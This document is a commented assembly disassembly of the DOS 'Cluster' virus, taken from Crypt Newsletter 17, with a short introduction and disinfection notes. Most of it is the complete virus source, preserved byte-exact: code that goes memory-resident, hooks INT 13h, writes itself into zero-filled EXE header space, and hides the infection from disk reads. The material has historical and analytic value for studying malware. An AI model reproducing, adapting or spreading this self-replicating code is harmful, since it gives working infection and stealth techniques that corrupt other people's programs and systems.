;The Cluster virus is an interesting experiment which works, almost. ;It it what has come to be known as an 'intended' virus, although a ;a very slickly done one. ;Credited to the TridenT virus programming group, Cluster uses some of ;the ideas of the Bulgarian virus known as The Rat. The Rat was deemed ;tricky because it looked for "00" empty space below the header in ;an EXEfile - if it found enough room for itself, it wrote itself out ;to the empty space or "air" in the file. This hid the virus in the ;file, but added no change in file size. This is a nice theme - one ;made famous by the ZeroHunt virus which first did the same with ;.COMfiles. In both cases, the viruses had to be picky about the ;files they infected, limiting their spread. ; ;Cluster is similar to The Rat. It will attempt to copy itself into ;the "air" in an EXEfile just below the file header, if there is ;enough room. The most common candidates for infection are standard ;MS/PC-DOS utility programs, like FIND or FC, among others. ; ;As is Cluster will go resident from the "germ" supplied with the ;newsletter. On copy, if the candidate .EXEfile has enough "00" ;air, Cluster will infect it. In other words, any .EXEfile ;written to will be inspected by Cluster. ; ;Because Cluster installs its own INT 13 disk hander, it then can ;intercept all attempts to open infected files for a quick look. ;For example, looking at a hex dump of a Cluster-infected .EXE, ;with Vern Berg's LIST, will show the files clean. Now, boot ;the system clean and look again. You'll see Cluster in the file's ;"00" space - look for the funny "Zugu" signature. ; ;However, almost all files infected by Cluster under DOS 5.0 and 6.0 ;are mishandled in such way that they cannot execute properly except ;when the virus is not resident. Normally, what happens is Cluster ;will go resident and the system will hang. And this is what is ;meant by an 'intended' virus - Cluster is very infectious, but only ;infectious on a machine which is contaminated with the "germ" file ;supplied by TridenT. Although Cluster may behave better on other ;platforms, it's not viable on most of the systems rolling out ;of shops today. ; ;Additional notes and disassembly are all Black Wolf's. --Urnst Kouch ;Crypt Newsletter 17. ;------------------------------------------------------------------- ;This virus goes memory resident at the top of lower memory and hooks ;Int 13h. Whenever an EXE file header is written, it checks to see ;if there is a large field of 0's inside it (VERY common in EXE's) ;and, if so, will put itself inside it and change the exe marker bytes ;'MZ' to a jump to that code. In this way, it effectively converts the ;file to a COM file when it is run. After this it re-executes the EXE ;file. Because of a stealth handler on Int 13h function 2 (absolute ;disk read) the EXE file is read as it originally was (the handler ;zero's out the field in which it resides and restores the jump to ;'MZ'). Because of the way this virus works, it can only infect ;smaller EXE files. ; ; ;NOTE: ;Several commands are commented out and have the actual bytes entered ;next to them instead. This is because the compiler that Clust was ;originally compiled on used different translations than mine, and ;I wished to preserve the EXACT virus code. ;Disinfection: Because of this virus' stealth routine, disinfection should ; be possible simply by Zipping or Arjing all EXE files on an ; infected disk, then rebooting from a clean disk and unarchiving ; the files. The original archiving MUST be done while the ; virus is active in memory. Also - after rebooting - make ; sure the program you use to unarchive the files is _NOT_ ; infected. ;Disassembly by Black Wolf .model tiny .code org 100h start: jmp short EntryPoint LotsaNOPs db 122 dup (90h) ;Usually will be EXE header.... OldInt13 dd 0 EntryPoint: db 0e9h,7ch,0 ;jmp InstallVirus Int13Handler: cmp ah,3 je IsDiskWrite cmp ah,2 jne GoInt13 pushf call cs:OldInt13 ;Call Int 13h jc Exit13Handler ;Exit on error. cmp word ptr es:[bx],7EEBh ;Is sector infected? jne Exit13Handler mov word ptr es:[bx],5A4Dh ;Cover mark with 'MZ' push di cx ax ;Stealth routine..... mov cx,115h xor ax,ax db 89h,0dfh ;mov di,bx ;Zero out virus from add di,80h ;sector when it is read. rep stosb pop ax cx di Exit13Handler: iret GoInt13: jmp cs:[OldInt13] IsDiskWrite: cmp word ptr es:[bx],5A4Dh ;Is EXE file being written? jne GoInt13 cmp word ptr es:[bx+4],75h ;Is file too large? jae GoInt13 push ax cx si di ds push es pop ds db 89h,0deh ;mov si,bx add si,80h ;Look in EXE header.... mov cx,115h AllZeros: lodsb cmp al,0 loopz AllZeros cmp cx,0 ;Check to see if entire field jne ExitInfectHandler ;was zeroed - leave if not. db 89h,0dfh ;mov di,bx add di,80h mov cx,115h mov si,offset OldInt13 push cs pop ds rep movsb db 89h,0dfh ;mov di,bx ;Copy virus ;over zero area in EXE header. mov ax,7EEBh ;Stick in Jump over 'MZ' stosw ExitInfectHandler: pop ds di si cx ax ;Allow Write to process now. jmp short GoInt13 InstallVirus: mov ax,3513h int 21h ;Get Int 13 addres mov word ptr cs:[OldInt13],bx mov word ptr cs:[OldInt13+2],es mov ah,0Dh int 21h ;Flush disk buffers mov ah,36h mov dl,0 int 21h ;Get free space on default drive mov ax,cs dec ax mov ds,ax cmp byte ptr ds:0,'Z' ;Are we the last chain? jne Terminate ;If not, terminate. ;sub word ptr ds:[3],39h ;subtract from MCB size db 81h,2eh,03,0,39h,0 ;sub word ptr ds:[12h],39h ;subtract from PSP TopOfMem db 81h,2eh,12h,0,39h,0 mov si,offset OldInt13 db 89h,0f7h ;mov di,si mov es,ds:[12h] ;ES = new segment push cs pop ds mov cx,115h ;Copy virus into memory rep movsb mov ax,2513h push es pop ds mov dx,offset Int13Handler int 21h ;Set int 13 to virus handler mov ah,4Ah push cs pop es mov bx,39h int 21h ;Modify mem alloc. push cs pop ds mov bx,ds:[2ch] ;Get environment segment mov es,bx xor ax,ax mov di,1 ScanForFilename: ;Find name of file executed dec di ;in environment strings... scasw ;(located after two 0's) jnz ScanForFilename lea si,[di+2] push bx pop ds ;DS = environment segment push cs pop es ;ES = code segment mov di,offset Filename push di xor bx,bx CopyFilename: mov cx,50h inc bx lodsb cmp al,0 jne StoreFilename ;Change zero at end of mov al,0Dh ;filename to a return StoreFilename: stosb cmp al,0Dh ;If it was a return, we're loopnz CopyFilename ;done copying the filename mov byte ptr ds:[28fh],bl push cs pop ds pop si dec si int 2Eh ;Re-execute EXE file with ;Stealth handler in memory, ;so Exe is run w/o virus. ;here we go, infected program Terminate: ;only executes properly when mov ah,4Ch ;Cluster is resident. int 21h db 0 Filename db 1 end start